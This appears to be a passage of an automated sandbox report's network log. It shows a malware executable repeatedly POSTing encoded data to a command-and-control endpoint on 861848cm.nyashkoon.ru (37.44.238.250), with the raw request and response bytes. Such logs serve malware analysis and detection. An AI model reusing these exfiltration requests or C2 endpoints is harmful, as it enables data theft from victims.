                                                                                            Data Ascii: V^_[SZPZZ_RQTY[ZURYZQRRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/Y>V?8+ +)*-]'^4Z4%<>96 4$&]2)'X$.Q-*
Nov 5, 2024 23:53:17.620317936 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:17.698156118 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49886 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:18.121941090 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:18.944107056 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:19.018728018 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49892 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:19.155848026 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:19.968940973 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:20.041867018 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49898 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:20.418812990 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49900 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:20.630412102 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:21.444396973 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:21.518661976 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:19 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49909 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:21.675808907 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
Nov 5, 2024 23:53:22.486474037 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:22.562428951 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49916 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:22.857980013 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:23.670419931 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:23.743163109 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49922 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:23.872757912 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:24.685395956 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:24.764105082 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49928 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:24.931308031 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:25.740813017 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49932 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:25.637578964 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:26.453510046 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:26.532166958 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49933 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:53:26.026117086 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:53:27.027290106 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:53:27.027825117 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:27.027987003 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            61    192.168.2.4    49940    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:27.162604094 CET    309    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:27.508645058 CET    1024    OUT    Data Raw: 56 52 5a 5d 56 5c 55 5d 5a 5f 52 51 54 5e 5b 5d 55 50 59 5e 51 55 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZ]V\U]Z_RQT^[]UPY^QURXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,Y1?<U$\=9>>>"[$$[#>)>$9%_7%'X$.Q-6
                                                                                            Nov 5, 2024 23:53:27.974730015 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:28.050991058 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            62    192.168.2.4    49946    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:28.514350891 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:28.868041039 CET    1024    OUT    Data Raw: 56 51 5a 5f 53 5d 55 5a 5a 5f 52 51 54 59 5b 5e 55 5d 59 58 51 51 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZ_S]UZZ_RQTY[^U]YXQQRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;"R=;4\+#)))>_37 ?.U+7X9%#!'9'9'X$.Q-*
                                                                                            Nov 5, 2024 23:53:29.325799942 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:29.401865959 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            63    192.168.2.4    49955    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:29.528367043 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:29.883605957 CET    1024    OUT    Data Raw: 56 57 5a 5a 56 56 55 5d 5a 5f 52 51 54 5f 5b 5a 55 56 59 5e 51 55 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VWZZVVU]Z_RQT_[ZUVY^QUR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,/"<8 _([**=X)Z0+8#1+-/Y,6 77*_1'X$.Q-2
                                                                                            Nov 5, 2024 23:53:31.334186077 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:31.334752083 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:31.335114956 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:53:31.335192919 CET    183    IN    HTTP/1.1 100 Continue
                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 32 32 3a 35 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 32 56 59 50
                                                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 22:53:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive2VYP
                                                                                            Nov 5, 2024 23:53:31.335648060 CET    183    IN    HTTP/1.1 100 Continue
                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 32 32 3a 35 33 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 32 56 59 50
                                                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 22:53:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            64    192.168.2.4    49961    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:31.496860027 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:31.852349043 CET    1024    OUT    Data Raw: 53 54 5f 58 53 58 55 5e 5a 5f 52 51 54 53 5b 5b 55 56 59 57 51 50 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_XSXU^Z_RQTS[[UVYWQPR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;1(;??(X>:2*!$+ 4?>U?4.^#1'X$.Q-
                                                                                            Nov 5, 2024 23:53:32.311724901 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:32.385070086 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            65    192.168.2.4    49962    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:31.550164938 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:31.899218082 CET    1284    OUT    Data Raw: 53 52 5a 55 56 57 50 5d 5a 5f 52 51 54 5f 5b 59 55 5c 59 5f 51 52 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SRZUVWP]Z_RQT_[YU\Y_QRR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\8?&W<(8X+34[=:&?->\38 _#Y>?0-0X4-2)'X$.Q-2
                                                                                            Nov 5, 2024 23:53:32.360049963 CET    25    IN    HTTP/1.1 100 Continue


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            66    192.168.2.4    49971    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:32.511348963 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:32.868091106 CET    1024    OUT    Data Raw: 56 54 5a 5a 56 5c 50 5a 5a 5f 52 51 54 53 5b 5c 55 5c 59 57 51 5f 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VTZZV\PZZ_RQTS[\U\YWQ_R\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\,Y*?8;+3(*)>*>>38 <-<-,-&'#'%9'X$.Q-
                                                                                            Nov 5, 2024 23:53:33.322463036 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:33.392414093 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                            67    192.168.2.4    49975    37.44.238.250    80    2212    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                            Nov 5, 2024 23:53:33.572199106 CET    333    OUT    POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:33.931773901 CET    1024    OUT    Data Raw: 53 56 5a 5f 53 5c 50 5a 5a 5f 52 51 54 53 5b 5b 55 55 59 5d 51 50 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SVZ_S\PZZ_RQTS[[UUY]QPRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X;1=8<U+)=_>)0? :?=3.6<#7>^'9'X$.Q-
                                                                                            Nov 5, 2024 23:53:34.384871006 CET    25    IN    HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:34.457220078 CET    158    IN    HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:32 GMT
